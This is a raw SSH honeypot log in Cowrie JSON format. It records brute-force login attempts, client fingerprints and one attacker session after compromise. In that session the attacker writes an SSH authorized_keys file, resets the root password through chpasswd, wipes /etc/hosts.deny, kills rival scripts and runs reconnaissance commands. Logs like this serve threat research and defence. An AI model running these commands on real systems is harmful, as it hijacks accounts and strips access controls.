{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:44:45.121917Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:44:45.122817Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38108,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fa864d62244","protocol":"ssh","message":"New connection: 212.227.235.229:38108 (1.2.3.4:22) [session: 9fa864d62244]","sensor":"my-vps","timestamp":"2025-08-26T13:44:45.491759Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:44:45.492543Z","src_ip":"212.227.235.229","session":"9fa864d62244"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:44:45.838980Z","src_ip":"212.227.235.229","session":"9fa864d62244"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:44:47.305658Z","src_ip":"212.227.235.229","session":"9fa864d62244"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:44:48.629494Z","src_ip":"212.227.235.229","session":"9fa864d62244"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46938,"dst_ip":"1.2.3.4","dst_port":22,"session":"018517c8b559","protocol":"ssh","message":"New connection: 212.227.125.160:46938 (1.2.3.4:22) [session: 018517c8b559]","sensor":"my-vps","timestamp":"2025-08-26T13:44:51.750074Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T13:44:51.750995Z","src_ip":"212.227.125.160","session":"018517c8b559"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T13:44:52.326324Z","src_ip":"212.227.125.160","session":"018517c8b559"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:44:53.477394Z","src_ip":"212.227.235.229","session":"6f7efbb47dcb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41250,"dst_ip":"1.2.3.4","dst_port":22,"session":"1710158913fa","protocol":"ssh","message":"New connection: 212.227.235.229:41250 (1.2.3.4:22) [session: 1710158913fa]","sensor":"my-vps","timestamp":"2025-08-26T13:44:54.491807Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:44:54.492608Z","src_ip":"212.227.235.229","session":"1710158913fa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:44:54.724523Z","src_ip":"212.227.235.229","session":"1710158913fa"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"12345qwert","message":"login attempt [ubuntu/12345qwert] failed","sensor":"my-vps","timestamp":"2025-08-26T13:44:55.654597Z","src_ip":"212.227.235.229","session":"1710158913fa"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:44:56.888018Z","src_ip":"212.227.235.229","session":"1710158913fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:44:57.008363Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T13:44:57.009276Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:44:57.321745Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:44:57.966429Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.command.input","input":"echo \"root:ZG38ei9Q8BJF\"|chpasswd|bash","message":"CMD: echo \"root:ZG38ei9Q8BJF\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-26T13:44:57.967156Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/fb478cd69a4d6fc4c72e850678e845f8556d5fa0a30c17e045dcbd20c51afe96","size":21,"shasum":"fb478cd69a4d6fc4c72e850678e845f8556d5fa0a30c17e045dcbd20c51afe96","duplicate":false,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/fb478cd69a4d6fc4c72e850678e845f8556d5fa0a30c17e045dcbd20c51afe96 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:44:58.276010Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:44:58.946442Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-26T13:44:58.947277Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-26T13:44:59.258833Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:44:59.259789Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":34888,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1e967353df7","protocol":"ssh","message":"New connection: 167.99.49.89:34888 (1.2.3.4:22) [session: f1e967353df7]","sensor":"my-vps","timestamp":"2025-08-26T13:44:59.800179Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:44:59.801111Z","src_ip":"167.99.49.89","session":"f1e967353df7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:44:59.944890Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-26T13:44:59.945789Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:44:59.947679Z","src_ip":"167.99.49.89","session":"f1e967353df7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:45:00.256432Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.login.failed","username":"sanjay","password":"sanjay@123","message":"login attempt [sanjay/sanjay@123] failed","sensor":"my-vps","timestamp":"2025-08-26T13:45:00.301807Z","src_ip":"167.99.49.89","session":"f1e967353df7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:45:00.898148Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-26T13:45:00.898877Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":30,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:45:01.215240Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:45:01.395498Z","src_ip":"167.99.49.89","session":"f1e967353df7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:45:01.979253Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-26T13:45:01.980219Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-26T13:45:01.980736Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:45:02.294553Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:45:02.933390Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-26T13:45:02.934364Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:45:03.246384Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:45:03.967893Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-26T13:45:03.968649Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":204,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:45:04.284497Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:45:04.963494Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-26T13:45:04.964230Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:45:05.278833Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:45:05.923602Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T13:45:05.924386Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:45:06.237077Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:45:06.949256Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-26T13:45:06.950044Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:45:07.264337Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:45:07.910088Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-26T13:45:07.910832Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:45:08.224160Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:45:08.939074Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T13:45:08.939749Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:45:09.248012Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:45:09.927352Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T13:45:09.928049Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:45:10.237782Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:45:10.888745Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-26T13:45:10.889523Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
